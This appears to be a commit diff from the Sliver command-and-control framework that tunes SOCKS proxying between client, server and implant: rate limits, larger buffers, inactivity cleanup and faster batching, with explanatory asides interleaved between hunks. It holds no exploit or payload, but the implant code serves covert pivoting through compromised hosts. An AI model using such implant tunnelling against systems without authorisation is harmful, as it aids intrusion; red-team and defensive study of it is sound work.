Performance Optimizations and Implant SOCKS Changes
navsec committed Nov 17, 2024
1 parent c18c193 commit 3eda32f
Showing 3 changed files with 82 additions and 16 deletions.
4 changes: 2 additions & 2 deletions client/core/socks.go
@@ -211,8 +211,8 @@ const leakyBufSize = 4108 // data.len(2) + hmacsha1(10) + data(4096)
var leakyBuf = leaky.NewLeakyBuf(2048, leakyBufSize)

func connect(conn net.Conn, stream rpcpb.SliverRPC_SocksProxyClient, frame *sliverpb.SocksData) {
- // Client Rate Limiter: 5 operations per second, burst of 1
- limiter := rate.NewLimiter(rate.Limit(5), 1)
+ // Client Rate Limiter: 10 operations per second, burst of 1
+ limiter := rate.NewLimiter(rate.Limit(10), 1)

SocksConnPool.Store(frame.TunnelID, conn)

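Note on the change above: rate.NewLimiter comes from golang.org/x/time/rate and implements a token bucket, so rate.Limit(10) with a burst of 1 allows roughly ten operations per second with no bursting. A minimal sketch of how such a limiter gates a proxy loop (illustrative only, not part of this commit; forwardOnce is a hypothetical stand-in for the body of connect):

package main

import (
	"context"

	"golang.org/x/time/rate"
)

// forwardOnce is a hypothetical stand-in for one unit of proxy work;
// it returns true when the connection is finished.
func forwardOnce() bool { return true }

func forwardLoop(ctx context.Context) error {
	// 10 tokens per second, at most 1 token held at a time.
	limiter := rate.NewLimiter(rate.Limit(10), 1)
	for {
		// Wait blocks until a token is available (or ctx is cancelled),
		// capping the loop at roughly ten iterations per second.
		if err := limiter.Wait(ctx); err != nil {
			return err
		}
		if forwardOnce() {
			return nil
		}
	}
}

func main() {
	_ = forwardLoop(context.Background())
}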
72 changes: 66 additions & 6 deletions implant/sliver/handlers/tunnel_handlers/socks_handler.go
@@ -36,16 +36,29 @@ import (
"google.golang.org/protobuf/proto"
)

+ const (
+ inactivityCheckInterval = 4 * time.Second
+ inactivityTimeout       = 15 * time.Second
+ )

type socksTunnelPool struct {
- tunnels *sync.Map // map[uint64]chan []byte
+ tunnels      *sync.Map // map[uint64]chan []byte
+ lastActivity *sync.Map // map[uint64]time.Time
}

var socksTunnels = socksTunnelPool{
- tunnels: &sync.Map{},
+ tunnels:      &sync.Map{},
+ lastActivity: &sync.Map{},
}

var socksServer *socks5.Server

+ // Initialize socks server
+ func init() {
+ socksServer = socks5.NewServer()
+ socksTunnels.startCleanupMonitor()
+ }

func SocksReqHandler(envelope *sliverpb.Envelope, connection *transports.Connection) {
socksData := &sliverpb.SocksData{}
err := proto.Unmarshal(envelope.Data, socksData)
@@ -58,6 +71,10 @@ func SocksReqHandler(envelope *sliverpb.Envelope, connection *transports.Connect
if socksData.Data == nil {
return
}

+ // Record activity as soon as we get data for this tunnel
+ socksTunnels.recordActivity(socksData.TunnelID)

// {{if .Config.Debug}}
log.Printf("[socks] User to Client to (server to implant) Data Sequence %d, Data Size %d\n", socksData.Sequence, len(socksData.Data))
// {{end}}
Expand All @@ -70,8 +87,6 @@ func SocksReqHandler(envelope *sliverpb.Envelope, connection *transports.Connect
socksServer = socks5.NewServer(
socks5.WithAuthMethods([]socks5.Authenticator{auth}),
)
- } else {
- socksServer = socks5.NewServer()
}

// {{if .Config.Debug}}
@@ -80,18 +95,27 @@ func SocksReqHandler(envelope *sliverpb.Envelope, connection *transports.Connect

// init tunnel
if tunnel, ok := socksTunnels.tunnels.Load(socksData.TunnelID); !ok {
- tunnelChan := make(chan []byte, 10)
+ tunnelChan := make(chan []byte, 500)
socksTunnels.tunnels.Store(socksData.TunnelID, tunnelChan)
tunnelChan <- socksData.Data
err := socksServer.ServeConn(&socks{stream: socksData, conn: connection})
if err != nil {
// {{if .Config.Debug}}
log.Printf("[socks] Failed to serve connection: %v", err)
// {{end}}
+ // Cleanup on serve failure
+ socksTunnels.tunnels.Delete(socksData.TunnelID)
return
}
} else {
- tunnel.(chan []byte) <- socksData.Data
+ select {
+ case tunnel.(chan []byte) <- socksData.Data:
+ // Data sent successfully
+ default:
+ // {{if .Config.Debug}}
+ log.Printf("[socks] Channel full for tunnel %d, dropping data", socksData.TunnelID)
+ // {{end}}
+ }
}
}

@@ -110,11 +134,13 @@ func (s *socks) Read(b []byte) (n int, err error) {
return 0, errors.New("[socks] invalid tunnel id")
}

+ socksTunnels.recordActivity(s.stream.TunnelID)
data := <-channel.(chan []byte)
return copy(b, data), nil
}

func (s *socks) Write(b []byte) (n int, err error) {
+ socksTunnels.recordActivity(s.stream.TunnelID)
data, err := proto.Marshal(&sliverpb.SocksData{
TunnelID: s.stream.TunnelID,
Data: b,
@@ -181,3 +207,37 @@ func (c *socks) SetReadDeadline(t time.Time) error {
func (c *socks) SetWriteDeadline(t time.Time) error {
return nil
}

+ func (s *socksTunnelPool) recordActivity(tunnelID uint64) {
+ s.lastActivity.Store(tunnelID, time.Now())
+ }
+
+ func (s *socksTunnelPool) startCleanupMonitor() {
+ go func() {
+ ticker := time.NewTicker(inactivityCheckInterval)
+ defer ticker.Stop()
+
+ for range ticker.C {
+ s.tunnels.Range(func(key, value interface{}) bool {
+ tunnelID := key.(uint64)
+ lastActivityI, exists := s.lastActivity.Load(tunnelID)
+ if !exists {
+ // If no activity record exists, create one
+ s.recordActivity(tunnelID)
+ return true
+ }
+
+ lastActivity := lastActivityI.(time.Time)
+ if time.Since(lastActivity) > inactivityTimeout {
+ // Clean up the inactive tunnel
+ if ch, ok := value.(chan []byte); ok {
+ close(ch)
+ }
+ s.tunnels.Delete(tunnelID)
+ s.lastActivity.Delete(tunnelID)
+ }
+ return true
+ })
+ }
+ }()
+ }
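Aside: the monitor above signals teardown by closing a tunnel's channel, and in Go a receive on a closed channel returns immediately with the element type's zero value. A consumer can tell "closed by cleanup" apart from "no data yet" with the two-value receive form; a minimal, generic sketch of that pattern (illustrative only, not code from this commit):

package main

import "fmt"

// drain reads until the producer (or a cleanup routine) closes the channel.
func drain(ch chan []byte) {
	for {
		data, ok := <-ch
		if !ok {
			// Channel was closed, e.g. by an inactivity monitor: stop reading.
			fmt.Println("tunnel channel closed, stopping reader")
			return
		}
		fmt.Printf("got %d bytes\n", len(data))
	}
}

func main() {
	ch := make(chan []byte, 2)
	ch <- []byte("hello")
	close(ch) // simulate cleanup closing the tunnel channel
	drain(ch)
}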
22 changes: 14 additions & 8 deletions server/rpc/rpc-socks.go
@@ -101,8 +101,10 @@ func (c *socksDataCache) recordActivity(tunnelID uint64) {
const (
writeTimeout = 5 * time.Second
batchSize = 100 // Maximum number of sequences to batch
- inactivityCheckInterval = 5 * time.Second
+ inactivityCheckInterval = 4 * time.Second
inactivityTimeout = 15 * time.Second
+ ToImplantTickerInterval = 10 * time.Millisecond // data going towards implant is usually smaller request data
+ ToClientTickerInterval = 5 * time.Millisecond // data coming back from implant is usually larger response data
)

func (s *Server) SocksProxy(stream rpcpb.SliverRPC_SocksProxyServer) error {
@@ -165,7 +167,7 @@ func (s *Server) SocksProxy(stream rpcpb.SliverRPC_SocksProxyServer) error {

if tunnel.Client == nil {
tunnel.Client = stream
- tunnel.FromImplant = make(chan *sliverpb.SocksData, 100)
+ tunnel.FromImplant = make(chan *sliverpb.SocksData, 500)

// Monitor tunnel goroutines for inactivity and cleanup
wg.Add(1)
@@ -203,10 +205,14 @@ func (s *Server) SocksProxy(stream rpcpb.SliverRPC_SocksProxyServer) error {
toImplantCacheSocks.mutex.RUnlock()
fromImplantCacheSocks.mutex.RUnlock()

- // Clean up goroutine if both directions have hit the idle threshold or if client has disconnected
- if time.Since(toLastActivity) > inactivityTimeout &&
- time.Since(fromLastActivity) > inactivityTimeout ||
- tunnel.Client == nil || session == nil {
+ // Clean up goroutine if both directions have hit the idle threshold
+ if time.Since(toLastActivity) > inactivityTimeout && time.Since(fromLastActivity) > inactivityTimeout {
s.CloseSocks(context.Background(), &sliverpb.Socks{TunnelID: tunnelID})
return
}

+ // Clean up goroutine if the client has disconnected early
+ if tunnel.Client == nil || session == nil {
+ s.CloseSocks(context.Background(), &sliverpb.Socks{TunnelID: tunnelID})
+ return
+ }
Expand All @@ -228,7 +234,7 @@ func (s *Server) SocksProxy(stream rpcpb.SliverRPC_SocksProxyServer) error {
}()

pendingData := make(map[uint64]*sliverpb.SocksData)
- ticker := time.NewTicker(50 * time.Millisecond) // 50ms ticker - data coming back from implant is usually larger response data
+ ticker := time.NewTicker(ToClientTickerInterval)
defer ticker.Stop()

for {
@@ -307,7 +313,7 @@ func (s *Server) SocksProxy(stream rpcpb.SliverRPC_SocksProxyServer) error {
}()

pendingData := make(map[uint64]*sliverpb.SocksData)
- ticker := time.NewTicker(100 * time.Millisecond) // 100ms ticker - data going towards implant is usually smaller request data
+ ticker := time.NewTicker(ToImplantTickerInterval)
defer ticker.Stop()

for {
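Aside: the new ToClientTickerInterval and ToImplantTickerInterval constants drive flush loops that batch pending SocksData frames between ticker fires instead of writing each frame immediately. A condensed sketch of that ticker-driven batching pattern (illustrative only; frame, flush, and batchLoop are hypothetical simplifications of the pendingData loops in the diff):

package main

import (
	"fmt"
	"time"
)

type frame struct {
	Sequence uint64
	Data     []byte
}

// flush writes out and clears whatever has accumulated; in the real code
// this would send to the gRPC stream or the implant tunnel.
func flush(pending map[uint64]frame) {
	for seq, f := range pending {
		fmt.Printf("flush seq=%d size=%d\n", seq, len(f.Data))
		delete(pending, seq)
	}
}

// batchLoop accumulates incoming frames and flushes them on each ticker fire.
func batchLoop(in <-chan frame, interval time.Duration) {
	pending := make(map[uint64]frame)
	ticker := time.NewTicker(interval)
	defer ticker.Stop()

	for {
		select {
		case f, ok := <-in:
			if !ok {
				flush(pending) // drain what's left, then stop
				return
			}
			pending[f.Sequence] = f
		case <-ticker.C:
			flush(pending)
		}
	}
}

func main() {
	in := make(chan frame, 8)
	go func() {
		in <- frame{Sequence: 1, Data: []byte("req")}
		in <- frame{Sequence: 2, Data: []byte("resp")}
		close(in)
	}()
	batchLoop(in, 5*time.Millisecond) // e.g. ToClientTickerInterval
}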
